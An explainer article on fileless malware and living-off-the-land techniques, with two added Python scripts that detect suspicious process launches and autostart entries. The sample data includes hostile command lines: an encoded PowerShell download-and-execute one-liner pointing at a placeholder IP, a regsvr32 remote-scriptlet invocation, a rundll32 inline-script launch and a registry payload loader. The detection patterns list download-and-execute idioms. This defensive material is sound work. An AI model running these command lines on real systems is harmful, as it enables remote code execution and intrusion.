What Is Fileless Malware? How It Works & How to Detect It
Fileless malware leaves almost nothing on disk — it runs in memory and abuses trusted system tools like PowerShell, so traditional antivirus has nothing to scan. Here's how it works.
Reviewed & fact-checked against primary sources by the TI News Feed Editorial Team. See our editorial & corrections policy.
Fileless malware is malicious activity that operates without writing a traditional malware file to disk. Instead of dropping an executable that antivirus can scan, it runs in a computer's memory (RAM) and abuses legitimate, trusted tools already built into the operating system to carry out its goals. Because there's little or no file for signature-based antivirus to find, fileless attacks are far stealthier than conventional malware — and they've become a favorite technique of sophisticated attackers.
In short: fileless malware doesn't bring its own weapons — it picks up the tools already lying around your system and turns them against you. This approach is often called "living off the land."
Why "fileless"?
Traditional antivirus works largely by scanning files on disk and comparing them against known malware signatures. Fileless malware sidesteps this entirely by never creating a recognizable malicious file. The term is slightly loose — some fileless attacks leave minor traces, such as a registry entry for persistence — but the defining idea is the same: there's no malware executable sitting on disk for a scanner to catch. The malicious logic lives in memory and in the misuse of legitimate processes.
How fileless attacks work
A typical fileless attack chain looks like this:
- Entry. The attacker gains a foothold — often through a phishing document with a malicious macro, or by exploiting a vulnerability in a browser or application.
- Execution in memory. Rather than dropping a file, the attack launches malicious code directly in memory, frequently by invoking a trusted scripting tool.
- Living off the land. It abuses legitimate system binaries and tools — collectively called LOLBins ("living-off-the-land binaries") — such as PowerShell, Windows Management Instrumentation (WMI), and other built-in utilities. Because these tools are signed, trusted, and used constantly by administrators, their activity blends into normal operations.
- Persistence (optional). To survive a reboot, the malware may hide a small loader in the Windows Registry or a scheduled task, then re-launch its in-memory payload.
- Objective. From there it can steal credentials, move laterally, or deploy further payloads like ransomware.
Why fileless malware is hard to detect
- Nothing to scan. Signature-based antivirus looks for malicious files; there often aren't any.
- It uses trusted tools. Blocking PowerShell or WMI outright isn't practical — administrators rely on them — so attackers hide in legitimate, expected activity.
- It's volatile. Memory-resident code can vanish on reboot, taking forensic evidence with it.
- It leaves only TTPs as indicators. With no file hash, IP address, or domain to block, defenders are left with the attacker's tools and techniques, the top of the Pyramid of Pain. Those are the most expensive indicators for an attacker to change, but also the hardest to turn into a simple blocklist.
How to detect fileless malware
If you can't scan for files, you have to watch behavior. Effective approaches include:
- Behavior-based EDR. Modern endpoint detection and response focuses on what processes do — flagging, for example, a Word document spawning PowerShell that connects to the internet, which is almost never legitimate.
- Memory analysis. Inspecting RAM, either a captured memory image or live process memory, can reveal code that exists nowhere on disk. YARA rules can be run against process memory as well as files, so a rule written for a known loader still fires even when nothing was ever written to disk.
- Script and command-line logging. Enable PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and process-creation auditing with command lines (Security Event ID 4688 with command-line inclusion turned on, or Sysmon Event ID 1). Script block logging records the script as it is actually executed, so an encoded or obfuscated one-liner is logged in the clear.
- Mapping to MITRE ATT&CK. Fileless techniques map cleanly to specific MITRE ATT&CK techniques, not just tactics: PowerShell is T1059.001, WMI is T1047, mshta, regsvr32 and rundll32 fall under System Binary Proxy Execution (T1218), and Run-key and scheduled-task persistence are T1547.001 and T1053.005. Each one gives hunters a concrete behavior to search for.
- Threat hunting. Proactive threat hunting for anomalous use of legitimate tools catches what automated defenses miss.
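The attack chain described earlier, seen from the detection side. The following is an added example, not code from the original page: it runs a few behavioral rules over constructed process-creation records shaped like Sysmon Event ID 1 or Security 4688 data. The record field names, the sample events, and the IP address (from the 203.0.113.0/24 documentation range) are this script's own assumptions. It shows the three checks a behavior-based rule set actually makes: an Office parent spawning a script host, an encoded PowerShell command decoded back to its in-memory download-and-execute payload, and a signed proxy binary handed a remote scriptlet.

```python
"""Behavioral detection of a fileless attack chain in process-creation telemetry.

Added example, not code from the page. Records mimic Sysmon Event ID 1 / Security
4688 data; the field names (parent_image, image, command_line) and the sample
events are this script's own constructed assumptions.
"""
import base64
import re

# Office applications should almost never spawn a script host or LOLBin.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and signed binaries commonly used for in-memory execution.
LOLBINS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
PROXY_BINARIES = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Download-and-execute idioms and evasion switches seen in PowerShell one-liners.
SUSPICIOUS_PS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|"
    r"net\.webclient|frombase64string|-nop\b|-noprofile\b|"
    r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass",
    re.IGNORECASE)
# A remote URL or scriptlet handed to mshta/regsvr32/rundll32 instead of a local file.
SUSPICIOUS_PROXY = re.compile(r"https?://|scrobj\.dll|javascript:|vbscript:", re.IGNORECASE)
# powershell -EncodedCommand and its short forms, followed by the base64 argument.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if there is none.

    The argument is base64 of UTF-16LE text, not of ASCII bytes.
    """
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script):
    """Build a -EncodedCommand argument; used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_event(event):
    """Return a list of finding strings for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    findings = []

    if parent in OFFICE_PARENTS and image in LOLBINS:
        findings.append(f"office parent {parent} spawned {image}")

    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    # Scan the raw command line and, when present, the decoded script.
    text = cmd if decoded is None else cmd + "\n" + decoded
    if image in POWERSHELL and SUSPICIOUS_PS.search(text):
        findings.append("in-memory download/execute or evasion flags in PowerShell")
    if image in PROXY_BINARIES and SUSPICIOUS_PROXY.search(cmd):
        findings.append(f"{image} given remote or scriptlet payload")
    return findings


def hunt(events):
    """Return [(index, findings)] for every event that triggered at least one rule."""
    hits = []
    for i, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            hits.append((i, findings))
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {   # Entry + execution in memory: macro launches hidden PowerShell that stages code.
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -w hidden -enc " + encode_command(
            "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"),
    },
    {   # Living off the land: a signed binary coerced into running a remote scriptlet.
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\regsvr32.exe",
        "command_line": "regsvr32 /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll",
    },
    {   # Benign administrator use of the same tool: must not fire.
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe Get-Service -Name Spooler",
    },
]

if __name__ == "__main__":
    for index, findings in hunt(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["command_line"][:60], findings)
```

The third event is the important one: the same powershell.exe, launched by an administrator, produces no finding, which is the whole point of scoring behavior (parent, switches, decoded content) rather than the binary name. In production these rules would be fed from a SIEM export or the Sysmon channel rather than an inline list.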
How to defend against fileless attacks
- Reduce the attack surface. Disable or restrict macros, and constrain scripting tools like PowerShell (for example, with constrained language mode and application control).
- Patch aggressively. Closing the vulnerabilities used for initial entry stops many fileless attacks before they start.
- Apply least privilege. Limiting what users and processes can do contains an attack that does get in.
- Enable rich logging so that in-memory and command-line activity is visible to your SIEM and hunters.
- Train users to resist the phishing lures that so often start the chain.
Common living-off-the-land tools (LOLBins)
Fileless attacks lean on a recurring set of legitimate, built-in utilities. Recognizing them is the first step to spotting their abuse:
- PowerShell — the most heavily abused tool, able to download and run code entirely in memory.
- Windows Management Instrumentation (WMI) — used for execution, persistence, and lateral movement.
- The Windows Registry — a hiding place for small loaders that re-launch in-memory payloads after reboot.
- Scheduled tasks — abused to gain persistence without dropping an obvious file.
- Signed system binaries such as mshta, rundll32, and regsvr32 — trusted executables coerced into running malicious code.
The defining challenge is that every one of these has a legitimate, daily use by system administrators. You can't simply block them — you have to distinguish normal use from malicious use, which is fundamentally a behavioral problem rather than a signature one.
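The registry and scheduled-task entries in the list above are the one place a "fileless" attack usually does leave a trace. The following is an added example, not code from the original page: it triages constructed autostart entries (Run-key values and scheduled-task actions, in the kind of shape you would get from reg.exe or schtasks exports) and separates a loader that evaluates a payload stored in another registry value, an inline script fed to a signed binary, and a long high-entropy registry blob from ordinary administrative use of PowerShell. The record layout, registry paths, task names and the blob itself are constructed for the example.

```python
"""Triage of autostart entries for fileless persistence.

Added example, not code from the page. Entries are constructed; the location/name/
value layout is this script's own convention, not an export format.
"""
import base64
import hashlib
import math
import re

SCRIPT_HOSTS = re.compile(
    r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", re.IGNORECASE)
# PowerShell that reads a registry value and evaluates it: the autostart entry is only
# a loader, the real payload lives in another key.
REGISTRY_READ = re.compile(
    r"get-itemproperty|\bgp\b|registry::|\[microsoft\.win32\.registry\]", re.IGNORECASE)
EVAL = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)
# rundll32/mshta handed inline script instead of a file on disk.
INLINE_SCRIPT = re.compile(r"(javascript|vbscript):", re.IGNORECASE)
HIDDEN_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.IGNORECASE)


def shannon_entropy(text):
    """Bits per character: English text sits near 4, base64 of encrypted data near 6."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_stored_payload(value, min_len=200, min_entropy=4.5):
    """A long, high-entropy string in an autostart-adjacent key is a payload candidate."""
    return len(value) >= min_len and shannon_entropy(value) >= min_entropy


def triage_entry(entry):
    """Return (severity, reasons) for one entry; severity is None when nothing fired."""
    value = entry["value"]
    reasons = []
    if REGISTRY_READ.search(value) and EVAL.search(value):
        reasons.append("loader evaluates code read from the registry")
    if INLINE_SCRIPT.search(value):
        reasons.append("inline script passed to a signed binary")
    if looks_like_stored_payload(value):
        reasons.append("long high-entropy value (possible stored payload)")
    if reasons:
        return "high", reasons
    if SCRIPT_HOSTS.search(value):
        reasons.append("script host in autostart")
        if HIDDEN_FLAGS.search(value):
            reasons.append("hidden/no-profile flags")
            return "high", reasons
        return "review", reasons  # legitimate admin scripts land here
    return None, reasons


def triage(entries):
    """Return [(location\\name, severity, reasons)] for entries needing attention."""
    out = []
    for entry in entries:
        severity, reasons = triage_entry(entry)
        if severity:
            out.append((entry["location"] + "\\" + entry["name"], severity, reasons))
    return out


def _constructed_blob():
    """Deterministic pseudo-random bytes standing in for an encoded payload (constructed)."""
    raw = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))
    return base64.b64encode(raw).decode("ascii")


RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# Constructed sample entries; paths and names are illustrative.
SAMPLE_ENTRIES = [
    {"location": RUN, "name": "OneDriveUpdate",
     "value": r'''powershell.exe -nop -w hidden -c "iex (gp 'HKCU:\Software\Classes\AppData').Blob"'''},
    {"location": r"HKCU\Software\Classes\AppData", "name": "Blob", "value": _constructed_blob()},
    {"location": r"Task Scheduler\Microsoft\Windows\Maintenance", "name": "Sync",
     "value": r'''rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new ActiveXObject("WScript.Shell").Run("powershell -w hidden -c Get-Date")'''},
    {"location": RUN, "name": "SecurityHealth",
     "value": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"location": r"Task Scheduler\Corp", "name": "NightlyBackup",
     "value": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for where, severity, reasons in triage(SAMPLE_ENTRIES):
        print(severity, where, reasons)
```

The two-tier result is deliberate: a scheduled task that runs a signed backup script with -File is routine and is marked for review, not alerted on, while a loader that pulls its payload back out of the registry and pipes it to Invoke-Expression is high severity on its own. The entropy check is a heuristic, so in practice it is paired with the loader check (the loader names the key holding the blob) rather than used alone.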
Fileless vs traditional malware
The contrast is sharp. Traditional malware drops a file on disk, which gives defenders something concrete to scan, hash, blocklist, and quarantine. Fileless malware deliberately avoids that artifact, living in memory and trusted tools, so the usual file-based defenses have nothing to grab onto. Traditional malware often persists as an obvious program; fileless malware may leave only a tiny registry loader or nothing at all after a reboot. The upshot is that the techniques that reliably catch conventional malware — signature scanning, file reputation — are exactly the ones fileless attacks are designed to evade, which is why the entire defensive model has to shift toward behavior.
Where threat intelligence fits
Because fileless malware relies on techniques rather than easily blocked files, knowing which techniques attackers are using is what makes detection possible. Threat intelligence describes the living-off-the-land methods, abused binaries, and behavioral patterns seen in active campaigns, giving defenders the specific behaviors to hunt for. This is intelligence centered on TTPs — the most durable and valuable layer of detection.
The bottom line
Fileless malware runs in memory and abuses trusted built-in tools — "living off the land" — so it leaves little or nothing on disk for traditional antivirus to catch. That stealth, plus its reliance on techniques rather than fixed indicators, makes it one of the hardest threats to detect and a staple of sophisticated attacks. Defense shifts from scanning files to watching behavior: EDR, memory and script logging, ATT&CK-mapped hunting, attack-surface reduction, and patching. To track the techniques attackers are using right now, follow our live threat intelligence feed, aggregated from dozens of authoritative sources.
Frequently asked questions
What is fileless malware?
Fileless malware is malicious activity that runs in a computer's memory and abuses legitimate built-in system tools instead of writing a traditional malware file to disk. Because there's little or no file to scan, it evades signature-based antivirus and is far stealthier than conventional malware.
What does 'living off the land' mean?
Living off the land means abusing legitimate, trusted tools already present on a system — like PowerShell and WMI, collectively called LOLBins (living-off-the-land binaries) — to carry out an attack. Because these tools are signed and commonly used, their malicious use blends into normal activity.
How do you detect fileless malware?
Watch behavior rather than files: use behavior-based EDR, memory analysis, detailed PowerShell and process-creation logging, mapping of activity to MITRE ATT&CK techniques, and proactive threat hunting for anomalous use of legitimate tools.
Why is fileless malware so hard to stop?
There's often no malicious file to scan, it hides inside trusted tools that can't simply be blocked, memory-resident code can disappear on reboot, and it relies on techniques rather than fixed file hashes — so there's no simple indicator to block.
How do you defend against fileless attacks?
Reduce the attack surface (restrict macros and scripting tools, use application control), patch aggressively to block initial entry, apply least privilege, enable rich logging for visibility, and train users against the phishing lures that typically begin the attack.